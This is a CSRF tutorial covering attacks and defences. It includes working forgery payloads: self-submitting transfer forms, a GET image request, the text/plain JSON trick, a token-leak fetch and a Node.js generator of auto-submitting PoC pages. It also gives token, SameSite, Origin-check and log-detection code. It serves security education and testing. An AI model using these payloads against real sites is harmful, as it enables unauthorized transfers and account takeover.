CSRF (Cross-Site Request Forgery) Comprehensive Guide

What is CSRF?

Cross-Site Request Forgery (CSRF) is an attack in which a page controlled by the attacker makes a victim's browser send a request the victim never intended to a web application where the victim is authenticated. It works because the browser attaches ambient credentials (session cookies, HTTP Basic auth) to a request regardless of which site initiated it; the attacker never sees the response, only triggers the action.

CSRF Impact Severity:

  • Unauthorized account changes
  • Financial transactions (transfers, purchases)
  • Data modification or deletion
  • Account takeover
  • Privilege escalation

Red Team Techniques (Offensive)

1. Basic CSRF Attacks

Form-Based CSRF

<!-- Hosted on the attacker's site; the victim's bank.com cookies are attached automatically
     unless SameSite rules block them, and no token is required by the target -->
<form action="https://bank.com/transfer" method="POST">
  <input type="hidden" name="amount" value="1000">
  <input type="hidden" name="to" value="attacker">
</form>
<script>document.forms[0].submit()</script>

GET-Based CSRF

Only possible when the application changes state on GET, which is itself the bug to fix. The request rides on any resource load, so it needs no script at all:

<img src="https://bank.com/transfer?amount=1000&to=attacker" width="0" height="0">

2. Advanced CSRF Techniques

JSON CSRF via Flash (historical)

# Flash could issue a cross-origin POST with an arbitrary Content-Type such as
# application/json while the browser attached the victim's cookies, which defeated
# servers that relied on the Content-Type alone as CSRF protection.
# Flash reached end of life in 2020 and is no longer shipped by browsers, so today an
# equivalent cross-origin JSON POST needs a CORS misconfiguration or the text/plain trick below.

Content-Type Bypass

# A form with enctype="text/plain" sends each field as name=value with no encoding, so the
# field name and value can be split such that the resulting body is valid JSON:
#   {"amount":1000,"to":"attacker","ignore":"="}
# Works only if the server parses the body as JSON without enforcing Content-Type: application/json
<form action="https://bank.com/api/transfer" method="POST" enctype="text/plain">
  <input name='{"amount":1000,"to":"attacker","ignore":"' value='"}'>
</form>
<script>document.forms[0].submit()</script>
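As an added example (not code from the original guide, nor from Burp), the Node.js script below generalises the forms above into a small proof-of-concept generator of the kind Burp Suite's PoC generator produces: given a captured request it emits a self-submitting page, using a normal form-urlencoded POST or the text/plain trick when the endpoint expects JSON. The target URL and parameters are made up. The JSON variant still only works if the server parses the body as JSON without checking Content-Type and the session cookie is sent cross-site (no SameSite restriction).

```javascript
// Added example: build a self-submitting CSRF proof-of-concept page from a captured request.
// Target URL and parameters are illustrative only.

function escapeAttr(s) {
  // Escape for use inside a double-quoted HTML attribute so the browser reconstructs
  // the exact name/value we want, including quotes and braces.
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Split a JSON object into a single (name, value) pair such that the text/plain encoding
// `name=value` produced by the browser is again valid JSON. The outer object always ends
// in '}', so we drop it, open a dummy string key, and let the value close both.
function jsonToTextPlainField(obj) {
  const json = JSON.stringify(obj);            // {"amount":1000,"to":"attacker"}
  return {
    name: json.slice(0, -1) + ',"ignore":"',   // {"amount":1000,"to":"attacker","ignore":"
    value: '"}',                               // browser inserts '=' between name and value
  };
}

// What a text/plain form body looks like on the wire for a single field:
// name=value followed by CRLF, with no percent-encoding (HTML form submission algorithm).
function textPlainBody(name, value) {
  return `${name}=${value}\r\n`;
}

// req: { url, method, params } for a classic form POST, or { url, method, json } for the
// text/plain JSON trick. Returns a complete HTML page that submits on load.
function buildCsrfPoc({ url, method = 'POST', params = null, json = null }) {
  const fields = [];
  let enctype = 'application/x-www-form-urlencoded';
  if (json !== null) {
    enctype = 'text/plain';
    const f = jsonToTextPlainField(json);
    fields.push([f.name, f.value]);
  } else {
    for (const [k, v] of Object.entries(params || {})) fields.push([k, v]);
  }
  const inputs = fields
    .map(([n, v]) => `  <input type="hidden" name="${escapeAttr(n)}" value="${escapeAttr(v)}">`)
    .join('\n');
  return [
    '<html><body>',
    `<form id="csrf" action="${escapeAttr(url)}" method="${escapeAttr(method)}" enctype="${enctype}">`,
    inputs,
    '</form>',
    '<script>document.getElementById("csrf").submit();</script>',
    '</body></html>',
  ].join('\n');
}

// Stand-alone demo with constructed input (bank.example is a made-up host).
console.log(buildCsrfPoc({ url: 'https://bank.example/transfer', params: { amount: '1000', to: 'attacker' } }));
console.log(buildCsrfPoc({ url: 'https://bank.example/api/transfer', json: { amount: 1000, to: 'attacker' } }));
```

textPlainBody() reproduces the browser's encoding, so you can confirm with JSON.parse that the payload the server will see is well-formed before hosting the page; an endpoint that rejects any Content-Type other than application/json is not exploitable this way.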

3. CSRF Token Exploitation

Token Leakage

// A page on another origin cannot read the target's HTML unless the target's CORS policy
// lets it, so this runs either from an XSS payload on the target (same origin) or against an
// endpoint that reflects arbitrary Origins with Access-Control-Allow-Credentials: true
fetch('https://bank.com/settings', { credentials: 'include' })
  .then(r => r.text())
  .then(html => {
    // the token is usually in a hidden input or a <meta> tag
    const m = html.match(/name="csrf_token" value="([^"]+)"/);
    return m && m[1];
  })

Token Prediction

# Only works if tokens are predictable (sequential, timestamp-derived, or from a guessable
# seed) and the server does not rate-limit; a 128-bit token from a CSPRNG cannot be guessed
for i in range(1000, 2000):
    try_token(base_token + str(i))  # try_token: submit the forged request with this candidate

4. Real-World Attack Scenarios

Bank Transfer

1. Victim logs into bank.com
2. Visits attacker site with hidden form
3. Form submits transfer to attacker

Account Takeover via Email Change

1. Victim clicks a link in a phishing email while logged in
2. A hidden request changes the account's recovery email address (password-change forms that demand the current password are not directly forgeable, so the attacker targets the email instead)
3. Attacker runs the legitimate password-reset flow against the new address and gains the account

5. Tools & Automation

Discovery Tools

  • Burp Suite Scanner
  • OWASP ZAP
  • CSRF Tester

Exploitation Tools

  • Burp Suite CSRF PoC Generator
  • XSS Hunter (for token theft)
  • Custom JavaScript payloads

Analysis Tools

  • Browser developer tools
  • Token analysis scripts
  • Request analyzers

Blue Team Defenses (Defensive)

1. Anti-CSRF Tokens

Synchronizer Token Pattern

// Node.js example. csurf stores its secret in a cookie or session, so cookie-parser (or a
// session middleware) must run first. Note that csurf has been deprecated upstream since 2022;
// prefer your framework's maintained CSRF protection for new code.
const express = require('express');
const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const app = express();
app.use(cookieParser());
app.use(express.urlencoded({ extended: false }));
app.use(csrf({ cookie: true }));
app.get('/form', (req, res) => {
  res.render('form', { csrfToken: req.csrfToken() }); // template emits it as hidden field _csrf
});
// POST/PUT/PATCH/DELETE handlers are checked automatically; a bad token raises EBADCSRFTOKEN

Double Submit Cookie

// Server sets a random, unguessable value in a cookie and the page echoes the same value in a
// form field (or header); a cross-site page can submit the form but cannot read the cookie
Set-Cookie: CSRF-TOKEN=<128-bit random value>; Secure; SameSite=Strict; Path=/
<input type="hidden" name="csrf_token" value="<same value>">
// The server rejects the request unless the two match. Weakness: anyone who can set a cookie
// for the domain (a compromised subdomain, cookie tossing) can plant a matching pair, so sign
// the cookie value with a server-side secret and bind it to the session ("signed double submit").

2. Cookie Protections

SameSite Attribute

Set-Cookie: session=abc123; SameSite=Lax; Secure; HttpOnly
// Lax: the cookie is sent on top-level GET navigations but not on cross-site POSTs, iframes or
// subresource loads, so state must never change on GET. Strict: never sent cross-site, which also
// breaks legitimate links into the app. None: requires Secure and gives no CSRF protection at all.
// Set the attribute explicitly rather than relying on Chrome's "Lax by default", whose two-minute
// grace period still sends fresh cookies on cross-site POSTs. Treat SameSite as defence in depth, not a
// replacement for tokens.

Cookie Prefixes

Set-Cookie: __Secure-session=abc123; Secure; HttpOnly; SameSite=Lax
Set-Cookie: __Host-session=abc123; Secure; HttpOnly; SameSite=Lax; Path=/
// __Secure-: the browser refuses the cookie unless it is set over HTTPS with the Secure flag.
// __Host-: additionally requires Path=/ and no Domain attribute, so a subdomain cannot set or
// overwrite it; this is what protects a double-submit cookie against cookie tossing.

3. Additional Protections

Custom Headers

// Require a custom header on state-changing API requests. A cross-origin page can only add one
// via fetch/XHR, which triggers a CORS preflight the server does not approve; a plain <form>
// cannot set it. Node exposes header names in lowercase.
if (request.headers['x-requested-with'] !== 'XMLHttpRequest') {
  return response.status(403).send('Forbidden');
}

Referer Validation

// Prefer the Origin header (sent by browsers on cross-origin requests and on POSTs) and fall
// back to Referer. Compare the parsed host exactly: a startsWith check on
// 'https://yourdomain.com' also accepts 'https://yourdomain.com.attacker.net', and reading
// request.headers.referer.startsWith throws when the header is absent.
const source = request.headers.origin || request.headers.referer;
let host = null;
try { host = source && new URL(source).host; } catch (e) { host = null; }
if (host !== 'yourdomain.com') {
  return response.status(403).send('Forbidden'); // fail closed when neither header is usable
}
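The Origin/Referer check done properly, as an added example that is not code from the original guide or from any web framework. It works on a generic request object of the shape { method, headers } with lowercased header names (as Node provides), lets safe methods through, prefers Origin over Referer, compares the parsed host exactly, and fails closed when both headers are missing or malformed. 'app.example' is an assumed application host.

```javascript
// Added example: Origin/Referer validation for state-changing requests.
// Assumption: the application is served only from app.example (host includes the port if any).
const ALLOWED_HOSTS = new Set(['app.example']);
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']); // must be side-effect free by design

function hostOf(value) {
  // A malformed header (including the literal string 'null' that browsers send for sandboxed
  // iframes, data: URLs and some redirects) parses to nothing and is treated as untrusted.
  try { return new URL(value).host; } catch (e) { return null; }
}

// Returns { ok, reason } rather than a bare boolean so the rejection reason can be logged.
function checkRequestOrigin(req) {
  if (SAFE_METHODS.has(String(req.method).toUpperCase())) return { ok: true, reason: 'safe method' };

  const origin = req.headers['origin'];
  const referer = req.headers['referer'];

  // Origin wins when present: browsers attach it to every cross-origin request and to POSTs,
  // and unlike Referer it is not stripped by referrer policies (it becomes 'null' instead).
  if (origin !== undefined) {
    const h = hostOf(origin);
    return h !== null && ALLOWED_HOSTS.has(h)
      ? { ok: true, reason: 'origin' }
      : { ok: false, reason: `bad origin ${origin}` };
  }
  if (referer !== undefined) {
    const h = hostOf(referer);
    return h !== null && ALLOWED_HOSTS.has(h)
      ? { ok: true, reason: 'referer' }
      : { ok: false, reason: `bad referer ${referer}` };
  }
  // Neither header: possibly a privacy proxy, but also trivial for an attacker to arrange.
  // Fail closed; if you must allow it, require a valid anti-CSRF token instead.
  return { ok: false, reason: 'missing origin and referer' };
}

// Stand-alone demo on constructed requests
console.log(checkRequestOrigin({ method: 'POST', headers: { origin: 'https://app.example' } }));
console.log(checkRequestOrigin({ method: 'POST', headers: { referer: 'https://app.example.attacker.net/' } }));
console.log(checkRequestOrigin({ method: 'POST', headers: {} }));
```

Because the check keys on the parsed host, it also rejects lookalikes such as https://app.example.attacker.net and https://attacker.net/app.example that defeat prefix or substring matching. Use it alongside tokens: header checks protect only against browser-initiated forgeries and depend on clients sending the headers.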

4. Framework Protections

Django CSRF Middleware

# settings.py (CsrfViewMiddleware is part of Django's default MIDDLEWARE; do not remove it)
MIDDLEWARE = [
    'django.middleware.csrf.CsrfViewMiddleware',
    ...
]

# Template: renders a hidden csrfmiddlewaretoken field. JavaScript callers must instead
# send the csrftoken cookie value in an X-CSRFToken request header.
<form method="post">{% csrf_token %}</form>

Spring Security

// Spring Security 5.7+/6.x style: WebSecurityConfigurerAdapter is deprecated/removed. CSRF protection is
// on by default; this only moves the token to a readable XSRF-TOKEN cookie so a JavaScript front end
// can echo it back in the X-XSRF-TOKEN header.
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.web.SecurityFilterChain;
import org.springframework.security.web.csrf.CookieCsrfTokenRepository;

@Configuration
public class SecurityConfig {
    @Bean
    public SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
        http.csrf(csrf -> csrf.csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse()));
        return http.build();
    }
}

5. Monitoring & Response

Detection

  • Missing CSRF tokens
  • Invalid token submissions
  • Referer header anomalies

Logging

  • Failed CSRF validations
  • Sensitive action attempts
  • Origin header mismatches

Response

  • Session invalidation
  • User notification
  • Forensic analysis
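Detection logic over failed-validation logs, as an added example (not code from the original guide or from any product). The log lines are constructed and the field names and thresholds are assumptions; adapt them to what your framework emits. Two patterns are worth alerting on: one foreign origin failing CSRF checks against many different users in a short window (a forgery page is live and victims are hitting it), and one IP submitting many invalid tokens (token guessing or replay). A lone expired-token failure from a user's own page, which is normal noise, is not flagged.

```javascript
// Added example: flag CSRF campaigns and token brute-forcing from application logs.
// Log format is assumed: "<ISO timestamp> csrf_fail key=value ..."; all lines are constructed.
const ALLOWED_ORIGINS = new Set(['https://app.example']);   // assumed application origin

const SAMPLE_LOGS = [
  '2024-05-01T10:00:01Z csrf_fail ip=198.51.100.7 user=carol path=/profile origin=https://app.example reason=expired_token',
  '2024-05-01T10:00:05Z csrf_fail ip=203.0.113.10 user=alice path=/transfer origin=https://evil.example reason=origin_mismatch',
  '2024-05-01T10:00:09Z csrf_fail ip=203.0.113.11 user=bob path=/transfer origin=https://evil.example reason=origin_mismatch',
  '2024-05-01T10:00:12Z csrf_fail ip=203.0.113.12 user=dave path=/transfer origin=https://evil.example reason=origin_mismatch',
  '2024-05-01T10:01:00Z csrf_fail ip=192.0.2.44 user=mallory path=/transfer origin=- reason=invalid_token',
  '2024-05-01T10:01:04Z csrf_fail ip=192.0.2.44 user=mallory path=/transfer origin=- reason=invalid_token',
  '2024-05-01T10:01:08Z csrf_fail ip=192.0.2.44 user=mallory path=/transfer origin=- reason=invalid_token',
  '2024-05-01T10:01:13Z csrf_fail ip=192.0.2.44 user=mallory path=/transfer origin=- reason=invalid_token',
  '2024-05-01T10:01:20Z csrf_fail ip=192.0.2.44 user=mallory path=/transfer origin=- reason=invalid_token',
];

function parseLogLine(line) {
  const [ts, event, ...pairs] = line.trim().split(/\s+/);
  const rec = { ts: Date.parse(ts), event };
  for (const pair of pairs) {
    const i = pair.indexOf('=');
    if (i > 0) rec[pair.slice(0, i)] = pair.slice(i + 1);
  }
  return rec;
}

function groupBy(items, keyFn) {
  const groups = new Map();
  for (const item of items) {
    const k = keyFn(item);
    if (!groups.has(k)) groups.set(k, []);
    groups.get(k).push(item);
  }
  return groups;
}

// Events (already sorted by time) that fall within windowMs starting at events[i].
function windowFrom(events, i, windowMs) {
  return events.filter((e) => e.ts >= events[i].ts && e.ts <= events[i].ts + windowMs);
}

function detectCsrfAbuse(lines, { windowMs = 60_000, minVictims = 3, minGuesses = 5 } = {}) {
  const events = lines.map(parseLogLine)
    .filter((e) => e.event === 'csrf_fail' && !Number.isNaN(e.ts))
    .sort((a, b) => a.ts - b.ts);
  const alerts = [];

  // Rule 1: a single foreign origin failing against >= minVictims distinct users -> live CSRF page.
  const foreign = events.filter((e) => e.origin && e.origin !== '-' && !ALLOWED_ORIGINS.has(e.origin));
  for (const [origin, evs] of groupBy(foreign, (e) => e.origin)) {
    for (let i = 0; i < evs.length; i++) {
      const victims = new Set(windowFrom(evs, i, windowMs).map((e) => e.user));
      if (victims.size >= minVictims) {
        alerts.push({ rule: 'csrf_campaign', key: origin, count: victims.size });
        break;
      }
    }
  }

  // Rule 2: >= minGuesses invalid tokens from one IP -> token guessing or replay.
  const invalid = events.filter((e) => e.reason === 'invalid_token');
  for (const [ip, evs] of groupBy(invalid, (e) => e.ip)) {
    for (let i = 0; i < evs.length; i++) {
      const n = windowFrom(evs, i, windowMs).length;
      if (n >= minGuesses) {
        alerts.push({ rule: 'token_bruteforce', key: ip, count: n });
        break;
      }
    }
  }
  return alerts;
}

console.log(detectCsrfAbuse(SAMPLE_LOGS));
```

On the constructed sample the campaign rule fires for https://evil.example (three victims in seven seconds) and the brute-force rule for 192.0.2.44 (five bad tokens in twenty seconds), while carol's single expired token from the application's own origin produces nothing. The campaign alert is the one that should trigger response: the victims' sessions are the ones to invalidate and the users to notify.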

Additional Resources & References

CSRF Mitigation Checklist

  • Implement anti-CSRF tokens for every state-changing request (POST, PUT, PATCH, DELETE)
  • Never change state on GET
  • Set the SameSite cookie attribute explicitly (Lax or Strict) as defence in depth
  • Validate the Origin header (falling back to Referer) for sensitive actions, comparing the host exactly and failing closed when both are absent
  • Require re-authentication for critical operations
  • Use framework-provided CSRF protections
  • Monitor for failed CSRF validations
  • Educate developers about CSRF risks
  • Regularly test your defenses

Legal Notice

This content is provided for educational purposes only. Never test security vulnerabilities against systems without explicit permission. Unauthorized testing may violate laws.